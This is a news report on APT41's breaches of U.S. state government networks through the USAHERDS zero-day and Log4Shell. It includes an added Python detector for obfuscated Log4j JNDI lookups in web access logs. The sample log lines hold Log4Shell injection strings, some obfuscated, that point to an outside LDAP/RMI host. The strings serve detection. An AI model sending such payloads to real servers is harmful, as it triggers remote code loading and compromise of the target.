
Chinese APT41 Hackers Broke into at Least 6 U.S. State Governments: Mandiant
2022-03-12 22:09

APT41, the China-affiliated state-sponsored threat actor, breached at least six U.S. state government networks between May 2021 and February 2022, retooling its initial-access tradecraft to exploit vulnerable internet-facing web applications.

The exploited vulnerabilities included "a zero-day vulnerability in the USAHERDS application as well as the now infamous zero-day in Log4j," researchers from Mandiant said in a report published Tuesday, calling it a "deliberate campaign." The USAHERDS flaw is tracked as CVE-2021-44207; the Log4j flaw is Log4Shell, CVE-2021-44228.

The latest disclosure continues APT41's pattern of quickly co-opting newly disclosed vulnerabilities: within hours of Log4Shell becoming public knowledge, the group used it to gain initial access to the networks of two U.S. state governments as well as insurance and telecom firms.
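Because the Log4Shell exploitation described above hit internet-facing web applications, the first place to look for it is the web server access log. The following is an added example, not code from the article or from Mandiant: it de-obfuscates the nested Log4j lookup tricks commonly seen in the wild (`${lower:...}`, `${upper:...}`, and `${...:-default}` fallbacks, plus URL encoding) and flags any `${jndi:...}` lookup that survives normalization. The log lines are constructed for the example, not real traffic.

```python
import re
from urllib.parse import unquote

# Nested lookups used to hide the literal string "jndi", for example
# ${${lower:j}ndi:ldap://...} or ${${env:NOPE:-j}ndi:...}. Each pattern is
# replaced by the text Log4j would evaluate it to, repeatedly, until stable.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# ${prefix:name:-default}: an unresolvable lookup falls back to "default",
# so ${env:NOPE:-j} and ${::-j} both evaluate to "j".
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Lookup prefixes are matched case-insensitively by Log4j's Interpolator.
_JNDI = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://[^}]*\}", re.IGNORECASE
)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding and the lookup-based obfuscations listed above."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(text: str) -> list:
    """Return every de-obfuscated ${jndi:...} lookup found in text."""
    return [m.group(0) for m in _JNDI.finditer(normalize_lookups(text))]


def scan_access_log(log: str) -> list:
    """Return (line_number, payload) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log.splitlines(), start=1):
        for payload in find_jndi(line):
            hits.append((n, payload))
    return hits


# Constructed combined-format access log (hypothetical addresses from the
# documentation ranges). Payloads appear in the request line and User-Agent.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:18:03:11 +0000] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:18:04:02 +0000] "GET /?x=${jndi:ldap://198.51.100.9:1389/a} HTTP/1.1" 200 512 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:18:05:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.9:1389/b}"
203.0.113.9 - - [10/Dec/2021:18:06:01 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for line_no, payload in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {payload}")
```

The normalizer only covers the obfuscations named in the comments; real-world payloads also abuse `${date:...}`, `${sys:...}` and base64-wrapped arguments, and the lookup may be logged by any field the application passes to Log4j, not only the request line and User-Agent. Treat a hit as a trigger for checking outbound LDAP/RMI connections from the host, not as proof of compromise on its own.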

The intrusions continued well into February 2022, when the hacking crew re-compromised two U.S. state government victims it had first infiltrated in May and June 2021, "demonstrating their unceasing desire to access state government networks," the researchers said.

APT41's years of operations against the healthcare, high-tech, and telecommunications sectors drew the attention of the U.S. Justice Department, which in 2020 charged five members of the group, landing them on the FBI's cyber most-wanted list.

In a related development, Google's Threat Analysis Group said it took steps last month to block a phishing campaign staged by another Chinese state-backed group, tracked as APT31, that was aimed at "high profile Gmail users affiliated with the U.S. government."


News URL

https://thehackernews.com/2022/03/chinese-apt41-hackers-broke-into-at.html